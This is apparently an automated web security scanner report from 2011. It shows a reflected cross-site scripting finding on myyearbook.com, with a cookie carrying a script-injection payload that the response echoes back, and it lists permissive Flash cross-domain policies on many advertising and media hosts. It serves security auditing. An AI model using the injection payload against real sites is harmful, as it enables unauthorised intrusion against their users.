GET /advertising/default.php?n=TribalFusion&section=None&size=728x90&site=MYB&sub=Network HTTP/1.1
Host: www.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; scorecardresearch=89164312-271382480-1311271170773; MYB_TARGET=d6cc0</script><script>alert(1)</script>8e6a735c675; __gads=ID=e4ff36fbd53734c2:T=1311271225:S=ALNI_MYXbcCfMT7-Mayo-AiWicg3ClEByg

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:00:43 GMT
Server: Apache
Content-Length: 827
Connection: close
Content-Type: text/html; charset=UTF-8
X-MyPoolMember: 10.100.20.154

<style>body{ padding:0px;margin:0px; }</style>
<html>
<head>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
<script type="text/javascript">
GS_googleAddAdSenseService("ca-pub-8250125438595222");
GS_googleEnableAllServices();
var u_id="d6cc0</script><script>alert(1)</script>8e6a735c675";var gen="";var age="";var zip="";</script>
...[SNIP]...

4. Flash cross-domain policy previous next
There are 41 instances of this issue:

http://a1.interclick.com/crossdomain.xml
http://ad.doubleclick.net/crossdomain.xml
http://altfarm.mediaplex.com/crossdomain.xml
http://analytics.spongecell.com/crossdomain.xml
http://api.chartbeat.com/crossdomain.xml
http://api.facebook.com/crossdomain.xml
http://cdn.interclick.com/crossdomain.xml
http://clk.atdmt.com/crossdomain.xml
http://contextlinks.netseer.com/crossdomain.xml
http://fls.doubleclick.net/crossdomain.xml
http://gadgets.justanswer.com/crossdomain.xml
http://haymarketbusinesspublications.122.2o7.net/crossdomain.xml
http://ic.nexac.com/crossdomain.xml
http://img.mediaplex.com/crossdomain.xml
http://l.5min.com/crossdomain.xml
http://m.webtrends.com/crossdomain.xml
http://metrics.apple.com/crossdomain.xml
http://pfiles.5min.com/crossdomain.xml
http://pixel.everesttech.net/crossdomain.xml
http://pixel1350.everesttech.net/crossdomain.xml
http://pshared.5min.com/crossdomain.xml
http://puma.vizu.com/crossdomain.xml
http://rad.msn.com/crossdomain.xml
http://secure-us.imrworldwide.com/crossdomain.xml
http://syn.5min.com/crossdomain.xml
http://web2.checkm8.com/crossdomain.xml
http://www.righthealth.com/crossdomain.xml
http://community.spiceworks.com/crossdomain.xml
http://disqus.com/crossdomain.xml
http://feeds.bbci.co.uk/crossdomain.xml
http://googleads.g.doubleclick.net/crossdomain.xml
http://images.apple.com/crossdomain.xml
http://mm.chitika.net/crossdomain.xml
http://newsrss.bbc.co.uk/crossdomain.xml
http://pagead2.googlesyndication.com/crossdomain.xml
http://pubads.g.doubleclick.net/crossdomain.xml
http://static.ak.fbcdn.net/crossdomain.xml
http://www.apple.com/crossdomain.xml
http://www.disqus.com/crossdomain.xml
http://www.facebook.com/crossdomain.xml
http://www.scmagazineus.com/crossdomain.xml

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

4.1. http://a1.interclick.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1.interclick.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a1.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 12 Jul 2011 20:41:04 GMT
Accept-Ranges: bytes
ETag: "2d5a54d440cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Thu, 21 Jul 2011 19:24:38 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.2. http://ad.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Thu, 21 Jul 2011 16:13:58 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.3. http://altfarm.mediaplex.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1289502469000"
Last-Modified: Thu, 11 Nov 2010 19:07:49 GMT
Content-Type: text/xml
Content-Length: 204
Date: Thu, 21 Jul 2011 19:28:47 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.4. http://analytics.spongecell.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://analytics.spongecell.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: analytics.spongecell.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Thu, 21 Jul 2011 19:30:49 GMT
Content-Type: text/xml
Content-Length: 325
Last-Modified: Tue, 22 Mar 2011 01:45:24 GMT
Connection: close
Vary: Accept-Encoding
Expires: Thu, 21 Jul 2011 19:30:48 GMT
Cache-Control: no-cache
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.5. http://api.chartbeat.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.chartbeat.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: api.chartbeat.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 21 Jul 2011 16:12:57 GMT
Content-Type: text/xml
Content-Length: 342
Last-Modified: Tue, 12 Jul 2011 19:40:15 GMT
Connection: close
Access-Control-Allow-Origin: *
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.6. http://api.facebook.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.facebook.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: api.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: application/xml
Expires: Sat, 20 Aug 2011 19:22:11 GMT
X-FB-Server: 10.42.14.49
Connection: close
Content-Length: 280

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<site-
...[SNIP]...

4.7. http://cdn.interclick.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.interclick.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.interclick.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:31:27 GMT
Server: PWS/1.7.3.3
X-Px: ms iad-agg-n5 ( iad-agg-n25), ht-d iad-agg-n25.panthercdn.com
ETag: "2d5a54d440cc1:0"
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Cache-Control: max-age=604800
Expires: Sun, 24 Jul 2011 12:05:37 GMT
Age: 372350
Content-Length: 225
Content-Type: text/xml
Last-Modified: Tue, 12 Jul 2011 20:41:04 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.8. http://clk.atdmt.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://clk.atdmt.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: clk.atdmt.com

Response

HTTP/1.1 200 OK
Content-Length: 207
Content-Type: text/xml
Date: Thu, 21 Jul 2011 17:36:10 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

4.9. http://contextlinks.netseer.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://contextlinks.netseer.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: contextlinks.netseer.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"313-1280025612000"
Last-Modified: Sun, 25 Jul 2010 02:40:12 GMT
Content-Type: application/xml
Content-Length: 313
Date: Thu, 21 Jul 2011 19:23:00 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" />
...[SNIP]...

4.10. http://fls.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Wed, 20 Jul 2011 22:25:07 GMT
Expires: Tue, 12 Jul 2011 22:21:58 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 79464
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.11. http://gadgets.justanswer.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gadgets.justanswer.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: gadgets.justanswer.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "717e2d35514ddef87be36dea79d4e6e7:1280183599"
Last-Modified: Mon, 26 Jul 2010 22:33:19 GMT
Accept-Ranges: bytes
Content-Length: 485
Content-Type: application/xml
Date: Thu, 21 Jul 2011 19:23:14 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" secure="false" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*" secure="true" to-ports="*"/>
...[SNIP]...

4.12. http://haymarketbusinesspublications.122.2o7.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://haymarketbusinesspublications.122.2o7.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: haymarketbusinesspublications.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:14:05 GMT
Server: Omniture DC/2.0.0
xserver: www403
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.13. http://ic.nexac.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ic.nexac.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ic.nexac.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 12 Jul 2011 20:41:04 GMT
Accept-Ranges: bytes
ETag: "2d5a54d440cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Thu, 21 Jul 2011 19:31:46 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.14. http://img.mediaplex.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:23:08 GMT
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1b1f-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.15. http://l.5min.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://l.5min.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: l.5min.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 02 Nov 2010 13:43:12 GMT
Accept-Ranges: bytes
ETag: "f5e7e9e4937acb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-Server: fmv-m02.ehost.aol.com
Date: Thu, 21 Jul 2011 19:24:25 GMT
Connection: keep-alive
Content-Length: 315

...<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.16. http://m.webtrends.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://m.webtrends.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: m.webtrends.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:73f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 21 Jul 2011 17:35:35 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.17. http://metrics.apple.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.apple.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.apple.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 20:25:06 GMT
Server: Omniture DC/2.0.0
xserver: www603
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.18. http://pfiles.5min.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pfiles.5min.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pfiles.5min.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:22:50 GMT
Server: PWS/1.7.3.3
X-Px: ht iad-agg-n34.panthercdn.com
ETag: "6c38932b2bf0ca1:0"
Cache-Control: max-age=31536000
Expires: Wed, 20 Jun 2012 19:38:27 GMT
Age: 2591063
Content-Length: 310
Content-Type: text/xml
Last-Modified: Mon, 10 May 2010 10:25:53 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*" />
...[SNIP]...

4.19. http://pixel.everesttech.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.everesttech.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.everesttech.net

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:29:51 GMT
Server: Apache
Last-Modified: Tue, 22 Mar 2011 22:39:33 GMT
ETag: "5e0288-cb-49f19eb07d340"
Accept-Ranges: bytes
Content-Length: 203
Keep-Alive: timeout=15, max=990034
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

4.20. http://pixel1350.everesttech.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel1350.everesttech.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel1350.everesttech.net

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:22:02 GMT
Server: Apache
Last-Modified: Tue, 22 Mar 2011 22:39:33 GMT
ETag: "37f8c15-cb-49f19eb07d340"
Accept-Ranges: bytes
Content-Length: 203
Keep-Alive: timeout=15, max=996026
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

4.21. http://pshared.5min.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pshared.5min.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pshared.5min.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:22:49 GMT
Server: PWS/1.7.3.3
X-Px: ht iad-agg-n27.panthercdn.com
ETag: "031c49ef11acc1:0"
Cache-Control: max-age=604800
Expires: Wed, 27 Jul 2011 10:25:24 GMT
Age: 118645
Content-Length: 315
Content-Type: text/xml
Last-Modified: Wed, 25 May 2011 15:37:14 GMT
Connection: close

...<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.22. http://puma.vizu.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://puma.vizu.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: puma.vizu.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:24:47 GMT
Server: PWS/1.7.3.3
X-Px: ht iad-agg-n29.panthercdn.com
ETag: "9c515-10d-8b2eaf40"
P3P: CP="DSP NID OTP UNR STP NON", policyref="/w3c/p3p.xml"
Cache-Control: max-age=604800
Expires: Sun, 24 Jul 2011 23:38:44 GMT
Age: 330363
Content-Length: 269
Content-Type: text/xml
Last-Modified: Thu, 09 Jun 2011 20:46:13 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-
...[SNIP]...

4.23. http://rad.msn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://rad.msn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: rad.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/xml
Last-Modified: Fri, 13 May 2011 05:32:00 GMT
Accept-Ranges: bytes
ETag: "088fa142f11cc1:0"
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Thu, 21 Jul 2011 20:05:09 GMT
Connection: keep-alive
Content-Length: 202

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

4.24. http://secure-us.imrworldwide.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://secure-us.imrworldwide.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Jul 2011 16:12:55 GMT
Content-Type: text/xml
Content-Length: 268
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
Connection: close
Expires: Thu, 28 Jul 2011 16:12:55 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

4.25. http://syn.5min.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://syn.5min.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: syn.5min.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 25 May 2011 15:39:52 GMT
Accept-Ranges: bytes
ETag: "014f1fcf11acc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-Server: fmv-m06 - syn
Date: Thu, 21 Jul 2011 19:22:47 GMT
Connection: keep-alive
Content-Length: 310

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*" />
...[SNIP]...

4.26. http://web2.checkm8.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://web2.checkm8.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: web2.checkm8.com

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:14:06 GMT
Server: Apache
P3P: policyref="http://web2.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.22 ny-ad12
ETag: "1311350993"
Last-Modified: Fri, 22-Jul-2011 16:09:53 GMT
Age: 0
Cache-Control: max-age=86400
Content-Length: 106
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.27. http://www.righthealth.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.righthealth.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.righthealth.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:22:58 GMT
Server: Apache/2.2.15 (Fedora)
Last-Modified: Wed, 15 Sep 2010 16:51:18 GMT
Accept-Ranges: bytes
Content-Length: 101
Cache-Control: max-age=14400
Expires: Thu, 21 Jul 2011 23:22:58 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/xml
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992;expires=Thu, 21-Jul-2011 19:37:58 GMT;path=/

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.28. http://community.spiceworks.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://community.spiceworks.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: community.spiceworks.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 17:35:42 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 13 Jul 2011 02:05:00 GMT
ETag: "3d10fb4-cc-4a7e9d800eb00"
Accept-Ranges: bytes
Content-Length: 204
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*.dell.com"/>
</cross-domain-pol
...[SNIP]...

4.29. http://disqus.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://disqus.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: disqus.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 16:13:30 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
p3p: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Length: 244
Connection: close
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.usopen.org" to-ports="80,96" secure="false" />
...[SNIP]...

4.30. http://feeds.bbci.co.uk/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://feeds.bbci.co.uk
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Thu, 21 Jul 2011 16:05:19 GMT
Date: Thu, 21 Jul 2011 16:03:19 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
